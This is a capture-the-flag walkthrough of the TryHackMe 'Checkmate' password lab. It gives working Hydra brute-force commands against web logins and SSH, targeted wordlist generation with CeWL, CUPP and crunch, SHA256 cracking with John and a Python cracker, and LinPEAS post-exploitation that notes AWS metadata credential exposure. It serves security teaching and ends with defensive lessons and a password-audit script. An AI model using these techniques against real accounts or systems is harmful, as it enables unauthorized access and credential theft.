TryHackMe — Checkmate | Full Walkthrough
Published 2026-6-16 06:49:16  Author: infosecwriteups.com (view original)  Reads: 6

Overview

Checkmate is a password-focused lab on TryHackMe that simulates a realistic internal network compromise scenario. The target is Marco Bianchi, an IT Operations employee whose weak password habits are exploited across multiple internal systems — from a firewall panel to SSH access. The lab teaches reconnaissance, credential harvesting, custom wordlist generation, hash cracking, and pattern-based brute forcing.

Attack Surface:

Port   Service
5000   Level App (API)
5001   FirewallOS Admin Panel
5002   Engineering Careers / Employee Portal
5003   Social.thm (Social Network)
22     SSH

Phase 1: Reconnaissance

Port Discovery & Directory Enumeration

Starting with service discovery across all four web ports using feroxbuster (-s 200 keeps only responses that actually exist, so login pages and API routes stand out from the noise):

feroxbuster -u 'http://10.48.176.143:5000/' -w /usr/share/wordlists/dirb/common.txt -s 200
feroxbuster -u 'http://10.48.176.143:5001/' -w /usr/share/wordlists/dirb/common.txt -s 200
feroxbuster -u 'http://10.48.176.143:5002/' -w /usr/share/wordlists/dirb/common.txt -s 200
feroxbuster -u 'http://10.48.176.143:5003/' -w /usr/share/wordlists/dirb/common.txt -s 200

Results:

  • http://10.48.176.143:5000/state — System state endpoint
  • http://10.48.176.143:5001/ — FirewallOS login panel
  • http://10.48.176.143:5002/login — Employee Portal login
  • http://10.48.176.143:5003/login — Social.thm login

OSINT — jobs.thm (Port 5002)

The Engineering Careers portal revealed key intelligence about our target before authentication was even required. The public job listings exposed:

  • Company values: Innovation, Excellence, Integrity
  • Target employee: Marco Bianchi — IT Operations Specialist
  • Locations: London, Berlin (remote/hybrid roles)

This OSINT phase is critical. These keywords will later form the basis of our custom wordlists.

Phase 2: Level 1 — FirewallOS (Port 5001)

Default Credential Attack

The FirewallOS admin panel is the first target. The system message on the panel itself hints: “Initial deployment completed with default admin credentials.”

Building a default credential wordlist:

cat << 'EOF' > default_list.txt
admin
admin123
password
firewall
12345
123456
root
secret
EOF

Launching Hydra:

hydra -l admin -P default_list.txt 10.48.176.143 -s 5001 \
http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -t 4

Result:

[5001][http-post-form] host: 10.48.176.143  login: admin  password: 12345

Level 1 Password: 12345

FirewallOS Intelligence Gathering

Inside the dashboard, three critical pieces of information are visible:

  1. Policy set: Marco_Default — confirms Marco manages this firewall
  2. Allow-SSH rule: AdminNet → Servers (22/tcp) — SSH is restricted but accessible from the right network
  3. System Message: “Secure internal employee portal next.” — confirms our next target

Phase 3: Level 2 — Employee Portal (Port 5002)

CeWL Wordlist Generation

The Engineering Careers portal contains rich content — job descriptions, company values, and keywords that an employee like Marco might use as a password. CeWL scrapes this content into a wordlist:

cewl http://10.48.176.143:5002/ -w jobs_words.txt

This generates over 100 words including: excellence, innovation, security, operations, London, Berlin, integrity, and more.

Expanding the wordlist with year-based mutations:

# One candidate per line: the bare word, word!, word+year and word+year! for 2024/2025.
# Reading with `read -r` avoids the word-splitting and glob expansion of $(cat ...).
while IFS= read -r word; do
  [ -z "$word" ] && continue
  printf '%s\n' "$word" "${word}!" "${word}2024" "${word}2025" "${word}2024!" "${word}2025!"
done < jobs_words.txt | sort -u > marco_passwords.txt

Brute Force Attack

hydra -l marco -P marco_passwords.txt 10.48.176.143 -s 5002 \
http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -t 4

Result:

[5002][http-post-form] host: 10.48.176.143  login: marco  password: excellence

Level 2 Password: excellence

After logging in, Marco’s full employee profile is revealed:

Field                 Value
First Name            Marco
Surname               Bianchi
Nickname              marky
Birthdate (DDMMYYYY)  14021995
Role                  IT Operations

This personal data becomes the foundation for Level 3.

Phase 4: Level 3 — Social.thm (Port 5003)

Personal Information Wordlist — CUPP

The hint on the social.thm login page reads: “Use the details from jobs.thm to generate Marco’s password.”

With Marco’s personal information now in hand, the correct approach is to use CUPP (Common User Passwords Profiler) — a tool that generates targeted wordlists from personal data:

cupp -i

Entering Marco’s details:

  • Name: Marco
  • Surname: Bianchi
  • Nickname: marky
  • Birthdate: 14021995

CUPP generates combinations like Bianchi2495, marco1995, Marky14021995, etc.

Attack

hydra -l marco -P marco.txt 10.48.176.143 -s 5003 \
http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -t 1 -w 5

Level 3 Password: Bianchi2495


After logging in, Marco’s social feed reveals two key hints for the remaining levels:

Post 1 (Level 5 hint):

“My tip for strong password: I take a company keyword, capitalize it, then append the year like 2024 or any other number and an exclamation mark.”

Tags: security, excellence, innovation, digital, cloud

Post 2 (Level 4 hint):

Check In: Oliver’s Hotel — with a profile picture

Phase 5: Level 4 — Hash Cracking

SHA256 Hash Identification

The profile picture is stored with a hashed filename:

d34a569ab7aaa54dacd715ae64953455d86b768846cd0085ef4e9e7471489b7b.png

A 64-character hex string is consistent with an unsalted SHA256 digest. The challenge: crack it to find the plaintext value, which will be Marco's password for this level.

echo "d34a569ab7aaa54dacd715ae64953455d86b768846cd0085ef4e9e7471489b7b" > marcopic.txt
john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt marcopic.txt

Result:

family           (?)

Level 4 Password: family
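The Level 4 step above is a plain dictionary attack against an unsalted digest: guess the algorithm from the digest length, hash every candidate, compare. The following script, added here as an illustration and not part of the original walkthrough, does the same thing offline with hashlib. The wordlist SAMPLE_WORDS is a constructed stand-in for rockyou.txt; the filename is the one from the page.

```python
import hashlib

# Constructed stand-in for rockyou.txt so the example runs offline.
SAMPLE_WORDS = ["123456", "password", "marco", "excellence", "family", "Security2024!"]

# Hex digest length -> unsalted algorithm to try first (same choice john's
# --format=raw-<alg> makes explicit).
_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def identify_hash(hexdigest):
    """Guess an unsalted hash type from the hex length; None if not hex-like."""
    h = hexdigest.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return _BY_LENGTH.get(len(h))


def crack(hexdigest, words, algorithm=None):
    """Return the first word whose digest matches the target, or None.

    Each candidate is hashed once and compared; no salt is assumed, which is
    exactly why a bare hash of a dictionary word falls to rockyou in seconds.
    """
    algorithm = algorithm or identify_hash(hexdigest)
    if algorithm is None:
        raise ValueError("unrecognised digest length; pass algorithm explicitly")
    target = hexdigest.strip().lower()
    for w in words:
        w = w.rstrip("\r\n")
        if hashlib.new(algorithm, w.encode("utf-8")).hexdigest() == target:
            return w
    return None


def crack_filename(filename, words):
    """Strip the extension from a hashed filename such as <hex>.png and crack it."""
    stem = filename.rsplit(".", 1)[0]
    return crack(stem, words)


if __name__ == "__main__":
    # The profile-picture name from the walkthrough.
    pic = "d34a569ab7aaa54dacd715ae64953455d86b768846cd0085ef4e9e7471489b7b.png"
    print(identify_hash(pic.rsplit(".", 1)[0]))
    print(crack_filename(pic, SAMPLE_WORDS))
```

To use a real wordlist, pass `open("/usr/share/wordlists/rockyou.txt", encoding="latin-1")` as `words`; the function streams it line by line rather than loading it into memory.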

Phase 6: Level 5 — SSH Access

Pattern-Based Brute Force with Crunch

Marco’s social post gave away his exact password formula:

[Capitalized company keyword] + [Year] + [!]

From the social post tags, Security is the most likely keyword. The post mentions 2024, but rather than bet on a single year, crunch enumerates every Security20XX! candidate (% is crunch's numeric placeholder):

crunch 13 13 -t Security20%%! -o marco-password.txt

This generates exactly 100 passwords: Security2000! through Security2099!.
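Both the Level 2 loop (word plus year and "!" suffixes) and the Level 5 crunch pattern (capitalised keyword plus year plus "!") are instances of the same thing: a small grammar over harvested words. The script below is an added example, not code from the walkthrough, that implements both generators with the years and suffixes as parameters, and extends the crunch step to every tag from Marco's post so a wrong keyword guess does not cost a second run. JOBS_WORDS and SOCIAL_TAGS are constructed from the words the page names, not a real CeWL dump.

```python
# Constructed inputs: a few of the jobs.thm keywords the walkthrough names,
# and the tags from Marco's social post.
JOBS_WORDS = ["excellence", "innovation", "integrity", "security", "london", "berlin"]
SOCIAL_TAGS = ["security", "excellence", "innovation", "digital", "cloud"]


def suffix_mutations(words, years=(2024, 2025), suffixes=("", "!")):
    """Level 2 style: word, word!, word<year>, word<year>! for every word.

    Same output as the page's bash loop for the default years/suffixes; the
    sets are parameters so other years or symbols need no code change.
    """
    out = set()
    for w in words:
        w = w.strip()
        if not w:
            continue
        for s in suffixes:
            out.add(f"{w}{s}")
            for y in years:
                out.add(f"{w}{y}{s}")
    return sorted(out)


def formula_candidates(keywords, years=range(2000, 2100), tail="!"):
    """Level 5 style: Marco's stated formula, Capitalised keyword + year + '!'.

    crunch -t Security20%%! enumerates one keyword; this covers every keyword
    given, so the list is len(keywords) * len(years) lines.
    """
    return [f"{k.strip().capitalize()}{y}{tail}" for k in keywords if k.strip() for y in years]


def write_wordlist(path, candidates):
    """Write one candidate per line, the format hydra -P expects; returns the count."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(candidates) + "\n")
    return len(candidates)


if __name__ == "__main__":
    lvl2 = suffix_mutations(JOBS_WORDS)
    lvl5 = formula_candidates(SOCIAL_TAGS)
    print(f"{len(lvl2)} Level 2 candidates, {len(lvl5)} Level 5 candidates")
    write_wordlist("marco_passwords.txt", lvl2)
    write_wordlist("marco-password.txt", lvl5)
```

Against SSH the five-tag list is 500 candidates instead of 100; with hydra -t 4 that is still well under the lockout-free budget of a lab, but on a real target the keyword order matters, so put the most likely tag first.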

Launching Hydra against SSH:

hydra -l marco -P marco-password.txt 10.48.176.143 ssh -t 4

Result:

[22][ssh] host: 10.48.176.143  login: marco  password: Security2024!

Level 5 Password: Security2024!

SSH Access Confirmed

ssh marco@10.48.176.143
# Password: Security2024!
marco@tryhackme-2404:~$ whoami
marco

Post-Exploitation — System Enumeration

With shell access as Marco, running LinPEAS for privilege escalation opportunities:

# From the attacker box: transfer via SCP (SSH port is allowed)
scp /root/linpeas.sh marco@10.48.176.143:/tmp/linpeas.sh
# On the target, in the SSH session as marco:
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh 2>/dev/null | tee /tmp/out.txt

Key Findings

System: Ubuntu 24.04 LTS (AWS EC2 — t3a.small, ap-south-1)

Users with console access:

marco   uid=1001  current user
qa      uid=1002  member of sudo group (!)
ubuntu  uid=1000  member of sudo group
root    uid=0

Critical finding — qa user has sudo privileges:

uid=1002(qa) gid=1002(qa) groups=1002(qa),27(sudo),100(users)

If qa's credentials can be obtained, full root access is achievable via sudo su.

Running services (ubuntu user):

/usr/bin/python3 social_app.py
/usr/bin/python3 level_app.py
/usr/bin/python3 jobs_app.py
/usr/bin/python3 firewall_app.py

All lab applications run as ubuntu from /home/ubuntu/lab/ — a restricted directory.

IAM Role exposed (AWS metadata): The machine runs with an attached IAM role named vulnerable-machine, and temporary AWS credentials were accessible via the metadata endpoint — a common real-world misconfiguration in cloud environments.
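The account findings above come out of LinPEAS, but the same answer falls out of two files. The script below is an added example, not part of the walkthrough: it parses /etc/passwd and /etc/group, lists the accounts with an interactive shell, and returns the ones (other than the current user) that can sudo, which is the list of credentials worth chasing next. PASSWD and GROUP are constructed excerpts modelled on the findings; on a target, read the real files instead.

```python
# Constructed /etc/passwd and /etc/group excerpts modelled on the LinPEAS
# findings; real files on the target contain many more system accounts.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
marco:x:1001:1001:Marco Bianchi:/home/marco:/bin/bash
qa:x:1002:1002:QA:/home/qa:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
"""
GROUP = """\
root:x:0:
sudo:x:27:ubuntu,qa
users:x:100:qa
ubuntu:x:1000:
marco:x:1001:
qa:x:1002:
"""

NOLOGIN = {"/usr/sbin/nologin", "/bin/false", "/sbin/nologin"}


def console_users(passwd_text):
    """uid -> name for accounts whose login shell is interactive."""
    users = {}
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, uid, _gid, _, _home, shell = line.split(":", 6)
        if shell not in NOLOGIN:
            users[int(uid)] = name
    return users


def group_members(group_text, passwd_text, group_name):
    """Members of a group: explicit members plus users whose primary gid is the group."""
    gid = None
    members = set()
    for line in group_text.splitlines():
        if not line:
            continue
        name, _, g, listed = line.split(":", 3)
        if name == group_name:
            gid = int(g)
            members = {m for m in listed.split(",") if m}
    if gid is None:
        return set()
    for line in passwd_text.splitlines():
        if not line:
            continue
        name, _, _uid, pgid, _, _home, _shell = line.split(":", 6)
        if int(pgid) == gid:
            members.add(name)
    return members


def escalation_targets(passwd_text, group_text, current_user):
    """Console accounts, other than the current one, that are in the sudo group."""
    sudoers = group_members(group_text, passwd_text, "sudo")
    return sorted(u for u in console_users(passwd_text).values()
                  if u in sudoers and u != current_user)


if __name__ == "__main__":
    print(console_users(PASSWD))
    print(escalation_targets(PASSWD, GROUP, "marco"))
```

Replace the constants with `open("/etc/passwd").read()` and `open("/etc/group").read()` on the target; both files are world-readable, so this needs nothing beyond the marco shell.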

Attack Chain Summary

[Reconnaissance]
└─ feroxbuster → discovered 4 web services + /state endpoint
└─ CeWL → scraped jobs.thm for keyword intelligence
└─ OSINT → Marco's name, nickname, birthdate, role
[Level 1 — FirewallOS]
└─ Default credentials: admin:12345
└─ Intel: Marco_Default policy, SSH restricted to AdminNet
[Level 2 — Employee Portal]
└─ CeWL wordlist + Hydra → marco:excellence
└─ Intel: Full personal profile (name, nickname, birthdate)
[Level 3 — Social.thm]
└─ CUPP personal wordlist → marco:Bianchi2495
└─ Intel: Password formula hint + profile picture hash
[Level 4 — Hash Cracking]
└─ SHA256 hash from profile picture filename
└─ John the Ripper + rockyou.txt → family
[Level 5 — SSH]
└─ Crunch pattern (Security20%%!) + Hydra → marco:Security2024!
└─ Shell access achieved
[Post-Exploitation]
└─ LinPEAS enumeration
└─ qa user identified as sudo member
└─ AWS IAM credentials exposed via metadata

Lessons Learned

For defenders:

  1. Never use default credentials. admin:12345 on a production firewall is catastrophic.
  2. Don’t publish personal information in employee portals accessible before authentication.
  3. Password policies must enforce more than character-class complexity: excellence, family, and formula-based passwords like Security2024! are trivially crackable, and the last one satisfies most complexity rules.
  4. Profile picture filenames should not be reversible hashes of meaningful values.
  5. OSINT is real. Every word on a public-facing web application is a potential password component.
  6. Restrict metadata endpoint access on cloud instances to prevent IAM credential theft.
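Lesson 3 is the one a policy engine can act on. The check below is an added example, not part of the walkthrough or any product: instead of counting character classes, it flags the structures this lab exploited, namely bare words from the organisation's own site, strings containing exposed personal details, and the keyword + year + symbol formula. ORG_KEYWORDS, PERSONAL and COMMON are constructed from what the page names; a real deployment would feed them from CeWL output, the HR directory and a breach list.

```python
import re

# Constructed inputs: keywords scraped from the organisation's public pages,
# personal details exposed by the employee portal, and a few breach-list words.
ORG_KEYWORDS = {"security", "excellence", "innovation", "integrity", "digital", "cloud"}
PERSONAL = {"marco", "bianchi", "marky", "1995", "1402", "0214", "14021995"}
COMMON = {"password", "123456", "12345", "family", "admin", "admin123"}

# Word, optional 2- or 4-digit year, optional trailing symbols: Marco's formula.
_FORMULA = re.compile(r"^(?P<word>[A-Za-z]+)(?P<year>\d{2}|\d{4})?(?P<sym>[!@#$%^&*?._-]*)$")


def weak_reason(password, keywords=ORG_KEYWORDS, personal=PERSONAL, common=COMMON):
    """Return why a password is predictable, or None if no rule fires.

    Character-class rules pass 'Security2024!'; these checks look for what an
    attacker actually enumerates with CeWL, CUPP and crunch.
    """
    lower = password.lower()
    if lower in keywords or lower in common:
        return "dictionary word (organisation keyword or breach list)"
    for p in sorted(personal):
        if len(p) >= 4 and p in lower:
            return f"contains personal detail {p!r}"
    m = _FORMULA.match(password)
    if m and m.group("word").lower() in (keywords | common):
        return "keyword + year + symbol formula"
    return None


def audit(candidates):
    """Map each candidate to its weakness reason (None means no rule fired)."""
    return {pw: weak_reason(pw) for pw in candidates}


if __name__ == "__main__":
    for pw, why in audit(["12345", "excellence", "Bianchi2495", "Security2024!",
                          "correct-horse-staple-7"]).items():
        print(f"{pw:25s} {why}")
```

The formula regex deliberately accepts a two-digit year and any trailing symbol run, because Marco's post says "2024 or any other number" and the attacker's generator will try exactly those variants.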

Tools used:

Tool             Purpose
feroxbuster      Directory enumeration
CeWL             Website-based wordlist generation
CUPP             Personal info wordlist generation
Hydra            HTTP and SSH brute force
Crunch           Pattern-based wordlist generation
John the Ripper  SHA256 hash cracking
LinPEAS          Post-exploitation enumeration
SCP              File transfer via SSH


Source: https://infosecwriteups.com/tryhackme-checkmate-full-walkthrough-49a418a8e956?source=rss----7b722bfd1b8d---4